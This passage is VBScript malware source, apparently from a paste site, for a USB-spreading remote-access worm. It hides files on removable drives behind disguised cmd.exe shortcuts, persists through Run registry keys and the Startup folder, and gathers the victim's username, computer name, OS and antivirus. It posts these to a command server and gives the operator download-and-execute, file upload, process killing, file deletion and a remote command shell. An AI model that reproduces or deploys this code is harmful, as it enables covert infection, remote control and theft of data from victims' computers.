- if filesystemobj.fileexists (drive.path & "\" & installname) then
- filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
- end if
- for each file in filesystemobj.getfolder( drive.path & "\" ).Files
- if not lnkfile then exit for
- if instr (file.name,".") then
- if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
- file.attributes = 2+4
- if ucase (file.name) <> ucase (installname) then
- filename = split(file.name,".")
- set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk")
- lnkobj.windowstyle = 7
- lnkobj.targetpath = "cmd.exe"
- lnkobj.workingdirectory = ""
- lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
- fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
- if instr (fileicon,",") = 0 then
- lnkobj.iconlocation = file.path
- else
- lnkobj.iconlocation = fileicon
- end if
- lnkobj.save()
- end if
- end if
- end if
- next
- for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
- if not lnkfolder then exit for
- folder.attributes = 2+4
- foldername = folder.name
- set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
- lnkobj.windowstyle = 7
- lnkobj.targetpath = "cmd.exe"
- lnkobj.workingdirectory = ""
- lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
- foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
- if instr (foldericon,",") = 0 then
- lnkobj.iconlocation = folder.path
- else
- lnkobj.iconlocation = foldericon
- end if
- lnkobj.save()
- next
- end If
- end If
- end if
- next
- err.clear
- end sub
- sub uninstall
- on error resume next
- dim filename
- dim foldername
- shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
- shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
- filesystemobj.deletefile startup & installname ,true
- filesystemobj.deletefile wscript.scriptfullname ,true
- for each drive in filesystemobj.drives
- if drive.isready = true then
- if drive.freespace > 0 then
- if drive.drivetype = 1 then
- for each file in filesystemobj.getfolder ( drive.path & "\").files
- on error resume next
- if instr (file.name,".") then
- if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
- file.attributes = 0
- if ucase (file.name) <> ucase (installname) then
- filename = split(file.name,".")
- filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
- else
- filesystemobj.deletefile (drive.path & "\" & file.name)
- end If
- else
- filesystemobj.deletefile (file.path)
- end if
- end if
- next
- for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
- folder.attributes = 0
- next
- end if
- end if
- end if
- next
- wscript.quit
- end sub
- function post (cmd ,param)
- post = param
- httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
- httpobj.setrequestheader "user-agent:",information
- httpobj.send param
- post = httpobj.responsetext
- end function
- function information
- on error resume next
- if inf = "" then
- inf = hwid & spliter
- inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
- inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter
- set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set os = root.execquery ("select * from win32_operatingsystem")
- for each osinfo in os
- inf = inf & osinfo.caption & spliter
- exit for
- next
- inf = inf & "plus" & spliter
- inf = inf & security & spliter
- inf = inf & usbspreading
- information = inf
- else
- information = inf
- end if
- end function
- sub upstart ()
- on error resume Next
- shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
- shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
- filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
- filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
- end sub
- function hwid
- on error resume next
- set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set disks = root.execquery ("select * from win32_logicaldisk")
- for each disk in disks
- if disk.volumeserialnumber <> "" then
- hwid = disk.volumeserialnumber
- exit for
- end if
- next
- end function
- function security
- on error resume next
- security = ""
- set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
- for each objitem in colitems
- versionstr = split (objitem.version,".")
- next
- versionstr = split (colitems.version,".")
- osversion = versionstr (0) & "."
- for x = 1 to ubound (versionstr)
- osversion = osversion & versionstr (i)
- next
- osversion = eval (osversion)
- if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
- set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
- Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
- for each objantivirus in colantivirus
- security = security & objantivirus.displayname & " ."
- next
- if security = "" then security = "nan-av"
- end function
- function instance
- on error resume next
- usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
- if usbspreading = "" then
- if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then
- usbspreading = "true - " & date
- shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
- else
- usbspreading = "false - " & date
- shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
- end if
- end If
- upstart
- set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
- set installfullnameshort = filesystemobj.getfile (installdir & installname)
- if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
- shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
- wscript.quit
- end If
- err.clear
- set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
- if err.number > 0 then wscript.quit
- end function
- sub sitedownloader (fileurl,filename)
- strlink = fileurl
- strsaveto = installdir & filename
- set objhttpdownload = createobject("msxml2.xmlhttp" )
- objhttpdownload.open "get", strlink, false
- objhttpdownload.send
- set objfsodownload = createobject ("scripting.filesystemobject")
- if objfsodownload.fileexists (strsaveto) then
- objfsodownload.deletefile (strsaveto)
- end if
- if objhttpdownload.status = 200 then
- dim objstreamdownload
- set objstreamdownload = createobject("adodb.stream")
- with objstreamdownload
- .type = 1
- .open
- .write objhttpdownload.responsebody
- .savetofile strsaveto
- .close
- end with
- set objstreamdownload = nothing
- end if
- if objfsodownload.fileexists(strsaveto) then
- shellobj.run objfsodownload.getfile (strsaveto).shortpath
- end if
- end sub
- sub download (fileurl,filedir)
- if filedir = "" then
- filedir = installdir
- end if
- strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
- set objhttpdownload = createobject("msxml2.xmlhttp")
- objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
- objhttpdownload.send ""
- set objfsodownload = createobject ("scripting.filesystemobject")
- if objfsodownload.fileexists (strsaveto) then
- objfsodownload.deletefile (strsaveto)
- end if
- if objhttpdownload.status = 200 then
- dim objstreamdownload
- set objstreamdownload = createobject("adodb.stream")
- with objstreamdownload
- .type = 1
- .open
- .write objhttpdownload.responsebody
- .savetofile strsaveto
- .close
- end with
- set objstreamdownload = nothing
- end if
- if objfsodownload.fileexists(strsaveto) then
- shellobj.run objfsodownload.getfile (strsaveto).shortpath
- end if
- end sub
- function upload (fileurl)
- dim httpobj,objstreamuploade,buffer
- set objstreamuploade = createobject("adodb.stream")
- with objstreamuploade
- .type = 1
- .open
- .loadfromfile fileurl
- buffer = .read
- .close
- end with
- set objstreamdownload = nothing
- set httpobj = createobject("msxml2.xmlhttp")
- httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
- httpobj.send buffer
- end function
- function enumdriver ()
- for each drive in filesystemobj.drives
- if drive.isready = true then
- enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
- end if
- next
- end Function
- function enumfaf (enumdir)
- enumfaf = enumdir & spliter
- for each folder in filesystemobj.getfolder (enumdir).subfolders
- enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
- next
- for each file in filesystemobj.getfolder (enumdir).files
- enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter
- next
- end function
- function enumprocess ()
- on error resume next
- set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
- set colitems = objwmiservice.execquery("select * from win32_process",,48)
- dim objitem
- for each objitem in colitems
- enumprocess = enumprocess & objitem.name & "|"
- enumprocess = enumprocess & objitem.processid & "|"
- enumprocess = enumprocess & objitem.executablepath & spliter
- next
- end function
- sub exitprocess (pid)
- on error resume next
- shellobj.run "taskkill /F /T /PID " & pid,7,true
- end sub
- sub deletefaf (url)
- on error resume next
- filesystemobj.deletefile url
- filesystemobj.deletefolder url
- end sub
- function cmdshell (cmd)
- dim httpobj,oexec,readallfromany
- set oexec = shellobj.exec ("%comspec% /c " & cmd)
- if not oexec.stdout.atendofstream then
- readallfromany = oexec.stdout.readall
- elseif not oexec.stderr.atendofstream then
- readallfromany = oexec.stderr.readall
- else
- readallfromany = ""
- end if
- cmdshell = readallfromany
- end function
Add Comment
Please, Sign In to add comment